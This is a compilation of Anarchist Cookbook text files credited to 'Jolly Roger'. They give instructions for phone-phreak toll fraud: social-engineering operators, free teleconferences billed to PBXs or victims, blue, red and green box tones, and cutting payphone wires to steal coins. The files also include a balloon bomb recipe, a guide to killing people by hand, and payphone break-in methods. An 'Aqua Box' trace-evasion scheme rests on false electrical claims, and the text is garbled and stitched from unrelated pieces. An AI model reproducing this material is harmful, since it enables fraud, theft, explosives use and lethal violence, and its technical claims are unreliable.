CN/A Operators are operators that do exactly the opposite of whatdirectory assistance operators are for. In my experience, theseoperators know more than the DA op's do & they are moresusceptable to "social engeneering." It is possible to bullshit aCN/A operator for the NON-PUB DA # (ie, you give them the name &they give you the unlisted number. See the article on unlistednumbers in this cookbook for more info about them.). This is dueto the fact that they assume that you are a fellow companyemployee. Unfortunately, the AT&T breakup has resulted in the
break-up of a few NON-PUB DA #'s and policy changes in CN/A
INTERCEPT Operator:
The intercept operator is the one that you are connected to whenthere are notenough recordings available to tell you that the #has been disconnected or changed. She usually says, "What # youcallin'?" with a foreign accent. This is the lowest operatorlifeform. Even though they don't know where you are calling from,it is a waste or your time to try to verbally abuse them sincethey usually understand very little English anyway.
Incidentally, a few area DO have intelligent INTERCEPT Operators.
OTHER Operators:
And then there are the: MObile, Ship-to-Shore, Conference, MarineVerify, "Leave Word and Call Back," Rout & Rate(KP+800+141+1212+ST), & other special operators who have onepurpose or another in the network.
Problems with an Operator> Ask to speak to their supervisor... orbetter yet the Group Chief (who is the highest ranking official inany office) who is the equivalent of the Madame ina whorehouse.
By the way, some CO's that willallow you to dial a 0 or 1 as the4th digit, will also allow you to call special operators & otherfun Tel. Co. #'s without a blue box. This is ver rare, though! Forexample,212-121-1111 will get you a NY Inward Operator.
Office Hierarchy~~~~~~~~~~~~~~~~
Every switching office in North America (the NPA system), isassigned an office name and class. There are five classes ofoffices numbered 1 through 5. Your CO is most likely a class 5 orend office. All long-distance (Toll) calls are switched by a tolloffice which can be a class 4, 3, 2, or 1 office. There is also aclass 4X office callen an intermediate point. The 4X office is adigital one that can have an unattended exchange attached to it(known as a Remote Switching Unit (RSU)).
The following chart will list the Office #, name, & how many ofthose office exist (to the best of my knowledge) in North America:
Class Name Abb # Existing----- ----------------------- --- -----------------> 1 Regional Center RC 12> 2 Sectional Center SC 67> 3 Primary Center PC 230> 4 Toll Center TC 1,300> 4P Toll Point TP n/a> 4X Intermediate Point IP n/a> 5 End Office EO 19,000> 6 RSU RSU n/a
When connecting a call from one party to another, the switchingequipment usually tries to find the shortest route between the
class 5 end office of the caller & the class 5 end officeof thecalled party. If no inter-office trunks exist between the twoparties, it will then move upward to the next highest office forservicing calls (Class 4). If the Class 4 office cannot handle thecall by sending it to another Class 4 or 5 office, it will then besent to the next highest office in the hierarchy (3). Theswitching equipment first uses the high-usage interoffice trunkgroups, if they are busy then it goes to the fina; trunk groups onthe next highest level. If the call cannot be connected, you willprobably get a re-order [120 IPM (interruptions per minute) busysignal] signal. At this time, the guys at Network Operations areprobably shitting in their pants and trying to avoid the dreadedNetwork Dreadlock (as seen on TV!).
It is also interesting to note that 9 connections in tandem iscalled ring-around-the-rosy and it has never occured in telephonehistory. This would cause an endless loop connection [a neat wayto really screw up the network].
The 10 regional centers in the US & the 2 in Canada are allinterconnected. they form the foundation of the entire telephonenetwork. Since there are only 12 of them, they are listed below:
Class 1 Regional Office Location NPA-------------------------------- ---Dallas 4 ESS 214Wayne, PA 215Denver 4T 303Regina No. 2SP1-4W (Canada) 306St. Louis 4T 314Rockdale, GA 404Pittsburgh 4E 412Montreal No. 1 4AETS (Canada) 504
That's it for now! More info to come Future update to theCookbook! Have fun! -Jolly Roger-

Basic Alliance Teleconferencing Courtesy of the Jolly Roger
Introduction:------------This phile will deal with accessing, understanding and using the AllianceTeleconferencing Systems.... it has many sections and for best use shouldbe printed out...enjoy...
Alliance:--------Alliance Teleconferencing is an independant company which allows thegeneralpublic to access and use it's conferencing equipment. Many rumors havebeen floating apound that Alliance is a subsidary of AT&T.Well, they are wrong. As stated above, Alliance is an entirely independantcompany. They use sophisticated equipment to allow users to talk to manypeople at once.
The Number:
---------Alliance is in the 700 exchange, thus it is not localized, well, notin a way. Alliance is only in certain states, and onlyresidents of these certain states can access by dialing direct. This,however, will be discussed in a later chapter. The numbers for allianceareas follows: 0-700-456-1000 (chicago) -1001 (los angeles) -1002 (chicago) -1003 (houston) -2000 (?) -2001 (?) -2002 (?) -2003 (?) -3000 (?) -3001 (?) -3002 (?) -3003 (?)
The locations of the first 4 numbers are known and i have stated them.However, the numbers in the 200x and 300x are not definately known.Rumor has it that the pattern repeats itself but this has not been proven.
Dialing:-------As stated before, Alliance is only in certain stated and only these statescan access them via dialing direct. However, dialing direct causes yourresidence to be charged for the conference and conference bills are notlow!!!Therefore, many ways have been discovered to start a conference withouthaving it billed to ones house. They are as follows:
1) Dialing through a PBX 2) Incorporating a Blue Box 3) Billing to a loop 4) Billing to a forwarded call
I am sure there are many more but these are the four i will deal with.
Dialing through a PBX:------- ------- - ---Probably the easiest method of creating a free conference is through a PBX.Simply call one in a state that has Alliance, input the PBX's code,dial 9 for an outside line and then dial alliance.An example of this would be:
PBX: 800-241-4911
When it answers it will give you a tone. At this tone input your code.
Code: 1234
After this you will receive another tone, now dial 9 for an outside line.You will now hear a dial tone. Simply dial Alliance from this point andthe conference will be billed to the PBX.
Using a Blue Box:
----- - ---- ---Another rather simple way of starting a conference is with a Blue Box.The following procedure is how to box a conference:Dial a number to box off of. In this example we will use 609-609-6099When the party answers hit 2600hz. This will cause the fone company'sequipment to think that you have hung up. You will hear a You have now 'seized' a trunk. After this, switch to multi-frequencyand dial:
KP-0-700-456-x00x-STKP=KP tone on Blue Boxx=variable between 1 and 3ST=ST tone on Blue BoxThe equipment now thinks that the operator has dialed Alliance from herswitchboard and the conference shall be billed there. Since Blue Boxingis such a large topic, this is as far as I will go into it's uses.
Billing to a loop:------- -- - ----A third method of receiving a free conference is by billing out to aloop. A loop is 2 numbers that when two people call, they can talkto each other. You're saying woop-tee-do right? Wrong! Loops can be usefull to phreaks. First, dial alliance direct. After goingthrough the beginning procedure, which will be discussed later in thistutorial, dial 0 and wait for an Alliance operator. When she answerstell her you would like to bill the conference to such and such anumber. (A loop where your phriend is on the other side) She will thencall that number to receive voice verification.Of course your phriend will be waiting and will accept the charges.Thus, the conference is billed to the loop.
Billing to call forwarding:------- -- ---- ----------When you dial a number that is call forwarded, it is first answered bythe original location, then forwarded. The original location willhang up if 2600hz is received from only ond end of the line.Therefore, if you were to wait after the forwarded residence answered,you would receive the original location's dial tone.
Example:Dial 800-325-4067The original residence would answer, then forward the call, a secondtype of ringing would be heard. When this second residence answerssimply wait until they hang up. After about twenty seconds you willthen receive the original residence's dial tone since it heard 2600hzfrom one end of the line. Simply dial Alliance from this point and theconference will be billed to the original residence.These are the four main ways to receive a free conference. I am suremany more exist, but these four are quite handy themselves.
Logon Procedure:----- ---------Once Alliance answers you will hear a two-tone combination. This is theirway of saying 'How many people do you want on the conference dude?'Simply type in a 2-digit combination, depending on what bridge of Allianceyou are on, between 10 and 59. After this either hit '*' to cancel theconference size and inout another or hit '#' to continue.You are now in Alliance Teleconferencing and are only seconds away from
having your own roaring conference going strong!!!
Dialing in Conferees:------- -- ---------To dial your first conferee, dial 1+npa+pre+suff and await his/her answer.
npa=area codepre=prefixsuff=suffix
If the number is busy, or if no one answers simply hit '*' and your callwill be aborted. But, if they do answer, hit the '#' key.This will add them to the conference.Now commence dialing other conferees.
Joining Your Conference:------- ---- ----------To join your conference from control mode simply hit the '#' key.Within a second or two you will be chatting with all your buddies.To go back into control mode, simply hit the '#' key again.
Transferring Control:------------ -------To transfer control to another conferee, go into control mode, hit the# 6+1+npa+pre+suff of the conferee you wish to give control to. If after,you wish to abort this transfer hit the '*' key.
:Transfer of control is often not available. When youreceive a message stating this, you simply cannot transfer control.
Muted Conferences:----- -----------To request a muted conference simply hit the 9 key. I am not exactlysure what a muted conference is but it is probably a way to keep unwantedeavesdroppers from listening in.
Dialing Alliance Operators:------- -------- ---------Simply dial 0 as you would from any fone and wait for the operator toanswer.
Ending Your Conference:------ ---- ----------To end your conference all together, that is kick everyone includingyourself off, go into control mode and hit '*'...after a few secondssimply hang up. Your conference is over.
Are Alliance Operators Dangerous?--- -------- --------- ---------No. Not in the least. The worst they can do to you while you are havinga conference is drop all conferees including yourself. This is in noway harmful, just a little aggravating.
Alliance and Tracing:-------- --- -------Alliance can trace, as all citizens of the United States can.But this has to all be pre-meditated and AT&T has to be called and it'sreally a large hastle, therefore, it is almost never done. Alliance simply
does not want it known that teenagers are phucking them over.The only sort of safety equipment Alliance has on-line is a simple penregister. This little device simply records all the numbers of theconferees dialed. No big deal. All Alliance can do is call up thatpersonsnumber, threaten and question. However, legally, they can do nothingbecauseall you did was answer your fone.
:Almost all instructions are told to the person in command byAlliancerecordings. A lot of this tutorial is just a listing of thosecommands plus information gathered by either myself or the phellowphreaks of the world!!!
(written by the Trooper)
Aqua Box Plans by Jolly Roger
Every true phreaker lives in fear of the dreadded F.B.I. 'Lock In Trace.'For a long time, it was impossible to escape from the Lock In Trace.This box does offer an escape route with simple directions to it.This box is quite a simple concept, and almost any phreaker with basicelectronics knowledge can construct and use it.
The Lock In Trace------------------A lock in trace is a device used by the F.B.I. to lock into the phoneusers location so that he can not hang up while a trace is in progress.For those of you who are not familiar with the conecpt of 'locking in',then here's a brief desciption. The F.B.I. can tap into a conversation,sort of like a three-way call connection. Then, when they get there,they can plug electricity into the phone line. All phone connectionsare held open by a certain voltage of electricity.That is why you sometimes get static and faint connections when you arecalling far away, because the electricity has trouble keeping the lineup. What the lock in trace does is cut into the line and generate that samevoltage straight into the lines. That way, when you try and hang up,voltageis retained. Your phone will ring just like someone was calling youeven after you hang up. (If you have call waiting, you should understandbetter about that, for call waiting intersepts the electricity and makesa tone that means someone is going through your line. Then, it is a matterof which voltage is higher. When you push down the receiver,then itsee-sawsthe electricity to the other side. When you have a person on each lineit is impossible to hang up unless one or both of them will hang up.If you try to hang up, voltage is retained, and your phone will ring.That should give you an understanding of how calling works. Also, whenelectricity passes through a certain point on your phone, the electricitycauses a bell to ring, or on some newer phones an electronic ring tosound.)So, in order to eliminate the trace, you somehow must lower thevoltage level on your phone line. You should know that every timesomeone else picks up the phone line, then the voltage does decreasea little. In the first steps of planning this out, Xerox suggested gettingabout a hundred phones all hooked into the same line that could allbe taken off the hook at the same time. That would greatly decrease the
voltage level. That is also why most three-way connections that are usingthe bell service three way calling (which is only $3 a month) become quitefaint after a while. By now, you should understand the basic idea. Youhave to drain all of the power out of the line so the voltage cannot be kept up. Rather sudden draining of power could quickly short outthe F.B.I. voltage machine, because it was only built to sustainthe exact voltage nessecary to keep the voltage out. For now, imaginethis. One of the normal Radio Shack generators that you can gopick up that one end of the cord that hooks into the central box has aphone jack on it and the other has an electrical plug. This way, youcan "flash" voltage through the line, but cannot drain it. So, somemodifications have to be done.
Materials----------A BEOC (Basic Electrical Output Socket), like a small lamp-typeconnection, where you just have a simple plug and wire that would pluginto a light bulb.One of cords mentioned above, if you can't find one then construct yourown... Same voltage connection, but the restrainor must be built in (I.E.The central box)Two phone jacks (one for the modem, one for if you are being traced toplug the aqua box into)Some creativity and easy work.
*Notice: No phones have to be destroyed/modified to make this box, sodon't go out and buy a new phone for it!
Procedure---------All right, this is a very simple procedure. If you have the BEOC, it coulddrain into anything: a radio, or whatever. The purpose of havingthat is you are going to suck the voltage out from the phone line intothe electrical appliance so there would be no voltage left to lockyou in with.1)Take the connection cord. Examine the plug at the end. It should haveonly two prongs. If it has three, still, do not fear. Make sure theelectrical appliance is turned off unless you wanna become a crispy critterwhile making this thing. Most plugs will have a hard plastic design on thetop of them to prevent you from getting in at the electrical wires inside.Well, remove it. If you want to keep the plug (I don't see why...)then just cut the top off. When you look inside, Lo and Behold,you will see that at the base of the prongs there are a few wiresconnecting in. Those wires conduct the power into the appliance.So, you carefully unwrap those from the sides and pull them out untilthey are about an inch ahead of the prongs. If you don't wanna keep thejack, then just rip the prongs out. If you are, cover the prongs withinsultation tape so they will not connect with the wires when the poweris being drained from the line.2)Do the same thing with the prongs on the other plug, so you have thewires evenly connected. Now, wrap the end of the wires around each other.If you happen to have the other end of the voltage cord hooked into thephone, stop reading now, you're too fucking stupid to continue. Afteryou've wrapped the wires around each other, then cover the whole thing withthe plugs with insulating tape. Then, if you built your own control boxor if you bought one, then cram all the wires into it and reclose it.That box is your ticket out of this.3)Re-check everything to make sure it's all in place. This is a pretty
flimsy connection, but on later models when you get more experienced atit then you can solder away at it and form the whole device into onebig box, with some kind of cheap mattel hand-held game inside to bethe power connector. In order to use it, just keep this box handy.Plug it into the jack if you want, but it will slightly lower thevoltage so it isn't connected. When you plug it in, if you see sparks,unplug it and restart the whole thing. But if it just seems fine then leaveit.
Use----Now, so you have the whole thing plugged in and all... Do not use thisunless the situation is desperate! When the trace has gone on, don'tpanic, unplug your phone, and turn on the appliance that it was hookedto. It will need energy to turn itself on, and here's a great source...The voltage to keep a phone line open is pretty small and a simple lightbulb should drain it all in and probably short the F.B.I. computer atthe same time.
Happy boxing and stay free! ------------Jolly Roger
Hindenberg Bomb by the Jolly Roger
Needed:1 Balloon1 Bottle1 Liquid Plumr1 Piece Aluminum FoilL1 Length Fuse
Fill the bottle 3/4 full with Liquid Plumr and add a little piece ofaluminum foil to it. Put the balloon over the neck of the bottle untilthe balloon is full of the resulting gas. This is highly flammablehydrogen.Now tie the baloon. Now light the fuse, and let it rise.When the fuse contacts the balloon, watch out!!!
-------[=How to Kill Someone==]------------[=WITH YOUR BARE HANDS=]-----
AN EXCERPT FROM THE ANARCHISTS COOKBOOK..... Courtesy of the Jolly Roger
This file will explain the basics of hand-to-hand combat, and will tellof the best places to strike and kill an enemy...When engaged in hand-to-hand combat, your life is always at stake.There is only one purpose in combat, and that is to kill your enemy.Never face an enemy with the idea of knocking him out.The chances are extremely good that he will kill YOU instead.When a weapon is not available, one must resort to the fulluse of his natural weapons. The natural weapons are:
1. The knife edge of your hands.2. Fingers folded at the second joint or knuckle.3. The protruding knuckle of your second finger.4. The heel of your hand.5. Your boot6. Elbows7. Knees
8. and Teeth.
Attacking is a primary factor. A fight was neverwon by defensive action. Attack with all of your strength.At any point or any situation, some vulnerable point on your enemiesbody will be open for attack. Do this while screaming as screaming hastwo purposes.
1. To frighten and confuse your enemy.2. To allow you to take a deep breath which, in turn, will putmore oxygen in your blood stream. Your balance and balance of yourenemy are two inportant factors; since, if you succeed in makingyour enemy lose his balance, the chances are nine toone that you can kill him in your next move. The best over-allstance is where your feet are spread about shoulders width apart,with your right foot about a foot ahead of the left. Both armsshould be bent at the elbows parallel to each other. Stand on theballs of your feet and bend your waist slightly. Kinda of like aboxer's crouch. Employing a sudden movement or a scream or yell canthrow your enemy off-balance. There are many vulnerable points ofthe body. We will cover them now:
Eyes:Use your fingers in a V-shape and attack in gouging motion.
Nose:(Extremely vulnerable) Strike with the knife edge of the handalong the bridge, which will cause breakage, sharp pain, temporaryblindness, and if the blow is hard enough, death. Also, deliver a blowwith the heel of your hand in an upward motion, thisð ðwill shove thebone up into the brain causing death.
Adam's Apple: This spot is usually pretty well protected, but if youget the chance, strike hard with the knife edge of your hand. Thisshould sever the wind-pipe, and then it's all over in a matter ofminutes.
Temple: There is a large artery up here, and if you hit it hardenough, it will cause death. If you manage to knock your enemy down,kick him in the temple, and he'll never get up again.
Back of the Neck: A rabbit punch, or blow delivered to the base ofthe neck can easily break it, but to be safe, it is better touse the butt of a gun or some other heavy blunt object.Upper lip: A large network of nerves are located. These nerves areextrememly close to the skin. A sharp upward blow will cause extremepain, and unconciosness.
Ears: Coming up from behind an enemy and cupping the hands in a clappingmotion over the victims ears can kill him immediately. The vibrationscaused from the clapping motion will burst his eardrums, and causeinternal bleeding in the brain.
Groin: A VERY vulnerable spot. If left open, get it with kneehard, and he'll buckle over very fast.
Kidneys: A large nerve that branches off to the spinal cord comes veryclose to the skin at the kidneys. A direct blow with the knife edgeof your hand can cause death.
There are many more ways to kill and injure an enemy, but these shouldwork best for the average person. This is meant only as informationand I would not recommend that you use this for a simple High School Brawl.Use these methods only, in your opinion, if your life is in danger.Any one of these methods could very easily kill or cause permanent damageto someone. One more word of caution, you should practice these movesbefore using them on a dummy, or a mock battle with a friend.(You don't have to actually hit him to practice, just work on accuracy.)
Phone Systems Tutorial III by The Jolly Roger
PREFACE:
THIS ARTICLE WILL FOCUS PRIMARILY ON THE STANDARD WESTERN ELECTRIC SINGLE-SLOT COIN TELEPHONE (AKA FORTRESS FONE) WHICH CAN BE DIVIDED INTO 3 TYPES:- DIAL-TONE FIRST (DTF)- COIN-FIRST (CF): (IE, IT WANTS YOUR $ BEFORE YOU RECEIVE A DIAL TONE)- DIAL POST-PAY SERVICE (PP): YOU PAYAFTER THE PARTY ANSWERS
DEPOSITING COINS (SLUGS):-------------------------ONCE YOU HAVE DEPOSITED YOUR SLUG INTO A FORTRESS, IT IS SUBJECTED TO AGAMUT OF TESTS. THE FIRST OBSTACAL FOR A SLUG IS THEMAGNETIC TRAP. THIS WILL STOP ANY LIGHT-WEIGHT MAGNETIC SLUGS AND COINS.IF IT PASSES THIS, THE SLUG IS THEN CLASSIFIED AS A NICKEL, DIME, ORQUARTER. EACH SLUG IS THEN CHECKED FOR APPROPRIATE SIZE AND WEIGHT. IFTHESETESTS ARE PASSED, IT WILL THEN TRAVEL THROUGH A NICKEL, DIME, OR QUARTERMAGNET AS APPROPRIATE. THESE MAGNETS SET UP AN EDDY CURRENT EFFECT WHICHCAUSES COINS OF THE APPROPRIATE CHARACTERISTICS TO SLOW DOWN SO THEYWILL FOLLOW THE CORRECT TRAJECTORY. IF ALL GOES WELL, THE COIN WILL FOLLOWTHECORRECT PATH (SUCH AS BOUNCING OFF OF THE NICKEL ANVIL) WHERE IT WILLHOPEFULLY FALL INTO THE NARROW ACCEPTED COIN CHANNEL.THE RATHER ELABORATE TESTS THAT ARE PERFORMED AS THE COIN TRAVELS DOWN THECOIN CHUTE WILL STOP MOST SLUGS AND OTHER UNDESIRABLE COINS, SUCH ASPENNIES, WHICH MUST THEN BE RETRIEVED USING THE COIN RELEASE LEVER.IF THE SLUG MIRACULOUSLY SURVIVES THE GAMUT, IT WILL THEN STRIKE THEAPPROPRIATE TOTALIZER ARM CAUSING A RATCHET WHEEL TO ROTATE ONCE FOR EVERY5-CENT INCREMENT (EG, A QUARTER WILL CAUSE IT TO ROTATE 5 TIMES).THE TOTALIZER THEN CAUSES THE COIN SIGNAL OSCILLATOR TO READOUT A DUAL-FREQUENCY SIGNAL INDICATING THE VALUE DEPOSITED TO ACTS (A COMPUTER) OR THETSPS OPERATOR. THESE ARE THE SAME TONES USED BY PHREAKS IN THE INFAMOUS REDBOXES. FOR A QUARTER, 5 BEEP TONES AREOUTPULSED AT 12-17 PULSES PER SECOND (PPS). A DIME CAUSES 2 BEEP TONES AT5 - 8.5 PPS WHILE A NICKEL CAUSES ONE BEEP TONE AT 5 - 8.5 PPS. A BEEPCONSISTS OF 2 TONES: 2200 + 1700 HZ. A RELAY IN THE FORTRESS CALLED THE "BRELAY" (YES, THERE IS ALSO AN 'A RELAY') PLACES A CAPACITOR ACROSS THESPEECH CIRCUIT DURING TOTALIZER READOUT TO PREVENT THE "CUSTOMER" FROMHEARING THE RED BOX TONES. IN OLDER 3 SLOT PHONES: ONE BELL(1050-1100 HZ) FOR A NICKEL, TWO BELLS FOR A DIME, AND ONE GONG (800 HZ)FOR AQUARTER ARE USED INSTEAD OF THE MODERN DUAL-FREQUENCY TONES.
==============TSPS & ACTS==============
WHILE FORTRESSES ARE CONNECTED TO THE CO OF THE AREA, ALL TRANSACTIONS AREHANDLED VIA THE TRAFFIC SERVICE POSITION SYSTEM (TSPS). IN AREAS THATDO NOT HAVE ACTS, ALL CALLS THAT REQUIRE OPERATOR ASSISTANCE, SUCH ASCALLING CARD AND COLLECT, ARE AUTOMATICALLY ROUTED TO A TSPS OPERATORPOSITION. IN AN EFFORT TO AUTOMATE FORTRESSSERVICE, A COMPUTER SYSTEM KNOWN AS AUTOMATED COIN TOLL SERVICE (ACTS) HASBEEN IMPLEMENTED IN MANY AREAS. ACTS LISTENS TO THE RED BOX SIGNALS FROMTHEFONES AND TAKES APPROPRIATE ACTION. IT IS ACTS WHICH SAYS, "TWO DOLLARSPLEASE(PAUSE) PLEASE DEPOSIT TWO DOLLARS FOR THE NEXT TEN SECONDS" (AND OTHERVARIATIONS). ALSO, IF YOU TALK FOR MORE THAN THREE MINUTES AND THENHANG-UP,ACTS WILL CALL BACK AND DEMAND YOUR MONEY. ACTS IS ALSO RESPONSIBLE FORAUTOMATED CALLING CARD SERVICE. ACTS ALSO PROVIDE TROUBLE DIAGNOSIS FORCRAFTSPEOPLE (REPAIRMEN SPECIALIZING IN FORTRESSES). FOR EXAMPLE, THERE ISACOIN TEST WHICH IS GREAT FOR TUNING UP RED BOXES. IN MANY AREAS THIS TESTCANBE ACTIVATED BY DIALING 09591230 AT A FORTRESS (THANKS TO KARL MARX FORTHISINFORMATION). ONCE ACTIVATED IT WILL REQUEST THAT YOU DEPOSIT VARIOUSCOINS.IT WILL THEN IDENTIFY THE COIN AND OUTPULSE THE APPROPRIATE RED BOXSIGNAL. THE COINS ARE USUALLY RETURNED WHEN YOU HANG UP.TO MAKE SURE THAT THERE IS ACTUALLY MONEY IN THE FONE, THE CO INITIATES A"GROUND TEST" AT VARIOUS TIMES TO DETERMINE IF A COIN IS ACTUALLY IN THEFONE. THIS IS WHY YOU MUST DEPOSIT AT LEAST A NICKEL IN ORDER TO USE A REDBOX!
GREEN BOXES:------------
PAYING THE INITIAL RATE IN ORDER TO USE A RED BOX (ON CERTAIN FORTRESSES)LEFT A SOUR TASTE IN MANY RED BOXER'S MOUTHS THUS THE GREEN BOX WASINVENTED.THE GREEN BOX GENERATES USEFUL TONES SUCH AS COIN COLLECT, COIN RETURN, ANDRINGBACK. THESE ARE THE TONES THAT ACTS OR THE TSPS OPERATOR WOULD SEND TOTHE CO WHEN APPROPRIATE. UNFORTUNATELY, THE GREEN BOX CANNOT BE USED AT AFORTRESS STATION BUT IT MUST BE USED BY THE CALLED PARTY.
HERE ARE THE TONES: COIN COLLECT 700 + 1100 HZ COIN RETURN 1100 + 1700 HZ RINGBACK 700 + 1700 HZBEFORE THE CALLED PARTY SENDS ANY OF THESE TONES, AN OPERATOR RELEASEDSIGNAL SHOULD BE SENT TO ALERT THE MF DETECTORS AT THE CO. THIS CAN BEACCOMPLISHED BY SENDING 900 + 1500 HZ OR A SINGLE 2600 HZ WINK (90 MS)FOLLOWED BY A 60 MS GAP AND THEN THE APPROPRIATE SIGNAL FOR AT LEAST 900MS.ALSO, DO NOT FORGET THAT THE INITIAL RATE IS COLLECTED SHORTLY BEFORE THE 3MINUTE PERIOD IS UP. INCIDENTALLY, ONCE THE ABOVE MF TONESFOR COLLECTING AND RETURNING COINS REACH THE CO, THEY ARE CONVERTED INTOAN APPROPRIATE DC PULSE (-130 VOLTS FOR RETURN & +130 VOLTS FOR COLLECT).THISPULSE IS THEN SENT DOWN THE TIP TO THE FORTRESS. THIS CAUSES THE COINRELAYTO EITHER RETURN OR COLLECT THE COINS. THE ALLEGED "T-NETWORK" TAKES
ADVANTAGEOF THIS INFORMATION. WHEN A PULSE FOR COIN COLLECT (+130 VDC) IS SENT DOWNTHE LINE, IT MUST BE GROUNDED SOMEWHERE. THIS IS USUALLY EITHER THEYELLOW OR BLACK WIRE. THUS, IF THE WIRES ARE EXPOSED, THESE WIRES CAN BECUT TO PREVENT THE PULSE FROM BEING GROUNDED. WHEN THE THREE MINUTEINITIAL PERIOD IS ALMOST UP, MAKE SURE THAT THE BLACK & YELLOW WIRES ARESEVERED; THEN HANG UP, WAIT ABOUT 15 SECONDS IN CASE OF A SECOND PULSE,RECONNECT THE WIRES, PICK UP THE FONE, HANG UP AGAIN, AND IF ALL GOES WELLITSHOULD BE "JACKPOT" TIME.
PHYSICAL ATTACK:----------------
A TYPICAL FORTRESS WEIGHS ROUGHLY 50 LBS. WITH AN EMPTY COIN BOX. MOST OFTHIS IS ACCOUNTED FOR IN THE ARMOR PLATING. WHY ALL THE SECURITY? WELL,BELL CONTRIBUTES IT TO THE FOLLOWING: "SOCIAL CHANGES DURING THE 1960'SMADE THE MULTISLOT COIN STATION A PRIME TARGET FOR: VANDALISM, STRONG ARMROBBERY, FRAUD, AND THEFT OF SERVICE. THIS BROUGHT ABOUT THE INTRODUCTIONOFTHE MORE RUGGED SINGLE SLOT COIN STATION AND A NEW ENVIRONMENT FOR COINSERVICE." AS FOR PICKING THE LOCK, I WILL QUOTE MR. PHELPS:"WE OFTEN FANTASIZE ABOUT 'PICKING THE LOCK' OR 'GETTING A MASTERKEY.' WELL, YOU CAN FORGET ABOUT IT. I DON'T LIKE TO DISCOURAGE PEOPLE,BUTIT WILL SAVE YOU FROM WASTING ALOT OF OUR TIME--TIME WHICH CAN BE PUT TOBETTER USE (HEH, HEH)." AS FOR PHYSICAL ATTACK, THE COIN PLATEIS SECURED ON ALL FOUR SIDE BY HARDENED STEEL BOLTS WHICH PASS THROUGH TWOSLOTS EACH. THESE BOLTS ARE IN TURN INTERLOCKED BY THE MAIN LOCK.ONE PHREAK I KNOW DID MANAGE TO TAKE ONE OF THE 'MOTHERS' HOME (WHICH WASATTACHED TO A PIECE OF PLYWOOD AT A CONSTRUCTION SITE; OTHERWISE, THEPERMANENT ONES ARE A BITCH TO DETACH FROM THE WALL!). IT TOOK HIM ALMOSTTEN HOURS TO OPEN THE COIN BOX USING A POWER DRILL, SLEDGE HAMMERS, ANDCROWBARS (WHICH WAS EMPTY -- PERHAPS NEXT TIME, HE WILL DEPOSIT A COIN FIRST TOHEAR IF IT SLUSHES DOWN NICELY OR HITS THE EMPTY BOTTOM WITH A CLUNK.)TAKING THE FONE OFFERS A HIGHER MARGIN OF SUCCESS. ALTHOUGH THIS MAY BEDIFFICULT OFTEN REQUIRING BRUTE FORCE AND THERE HAS BEEN SEVERAL CASES OFBACK AXLES BEING LOST TRYING TO TAKE DOWN A FONE! A QUICK AND DIRTY WAY TOOPEN THE COIN BOX IS BY USING A SHOTGUN. IN DETROIT, AFTER ECOLOGISTSCLEANED OUT A MUNICIPAL POND, THEY FOUND 168 COIN PHONE RIFLED.IN COLDER AREAS, SUCH AS CANADA, SOME SHREWD PEOPLE TAPE UP THE FONES USINGDUCT TAPE, POUR IN WATER, AND COME BACK THE NEXT DAY WHEN THE WATER WILLHAVEFROZE THUS EXPANDING AND CRACKING THE FONE OPEN.IN ONE CASE, "UNAUTHORIZED COIN COLLECTORS" WHERE CAUGHT WHEN THEYBROUGHT $6,000 IN CHANGE TO A BANK AND THE BANK BECAME SUSPICIOUS...AT ANY RATE, THE MAIN LOCK IS AN EIGHT LEVEL TUMBLER LOCATED ON THE RIGHTSIDEOF THE COIN BOX. THIS LOCK HAS 390,625 POSSIBLE POSITIONS (5 ^ 8, SINCETHEREARE 8 TUMBLERS EACH WITH 5 POSSIBLE POSITIONS) THUS IT IS HIGHLY PICKRESISTANT! THE LOCK IS HELD IN PLACE BY 4 SCREWS. IF THERE IS SUFFICIENTCLEARANCE TO THE RIGHT OF THE FONE, IT IS CONCEIVABLE TO PUNCH OUT THESCREWSUSING THE DRILLING PATTERN BELOW (PROVIDED BY ALEXANDER MUNDY IN TAP #32):
====================================
!! ^ !! ! ! 1- 3/16 " !! ! !<--- --->!! 1-1/2" -------------------- ! ! ! !! ! ! ! (+) (+)-! ----------- ---! !! ! ^ ! ! !! ! ! ! ! (Z) !! ! ! ! ! !! ! 2-3/16" ---! !! ! ! ! (+) (+) ! ! ! !! ! ! -------------------- ----------- !! !! (Z) KEYHOLE (+) SCREWS !!===================================
AFTER THIS IS ACCOMPLISHED, THE LOCK CAN BE PUSHED BACKWARDS DISENGAGINGTHE LOCK FROM THE COVER PLATE. THE FOUR BOLTS OF THE COVER PLATE CAN THENBE RETRACTED BY TURNING THE BOLTWORKS WITH A SIMPLE KEY IN THE SHAPE OF THEHOLE ON THE COIN PLATE (SEE DIAGRAM BELOW). OF COURSE, THERE ARE OTHERMETHODS AND DRILLING PATTERNS.
:-------------------------------------: _ ! ! ( ) !_! [ROUGHLY] DIAGRAM OF COVER PLATE KEYHOLE:-------------------------------------:
THE TOP COVER USES A SIMILAR (BUT NOT AS STRONG) LOCKING METHOD WITH THEKEYHOLE DEPICTED ABOVE ON THE TOP LEFT HIDE AND A REGULAR LOCK (PROBABLYTUMBLER ALSO) ON THE TOP RIGHT-HAND SIDE. IT IS INTERESTING TO EXPERIMENTWITH THE COIN SHUTE AND THE FORTRESSES OWN "RED BOX" (WHICH BELL DIDN'THAVETHE 'BALLS' TO COLOR RED).
MISCELLANEOUS:--------------
IN A FEW AREAS (RURAL & CANADA), POST-PAY SERVICE EXISTS. WITH THIS TYPEOFSERVICE, THE MOUTHPIECE IS CUT OFF UNTIL THE CALLER DEPOSITS MONEY WHENTHE CALLED PARTY ANSWERS. THIS ALSO ALLOWS FOR FREE CALLS TO WEATHER ANDOTHER DIAL-IT SERVICES! RECENTLY, 2600 MAGAZINE ANNOUNCED THE CLEAR BOXWHICHCONSISTS OF A TELEPHONE PICKUP COIL AND A SMALL AMP. IT IS BASED ON THEð ðRINCIPAL THAT THE RECEIVER IS ALSO A WEAK TRANSMITTER AND THAT BYAMPLIFYINGYOUR SIGNAL YOU CAN TALK VIA THE TRANSMITTER THUS AVOIDING COSTLYTELEPHONE CHARGES! MOST FORTRESSES ARE FOUND IN THE 9XXXAREA. UNDER FORMER BELL AREAS, THEY USUALLY START AT 98XX (RIGHT BELOW THE
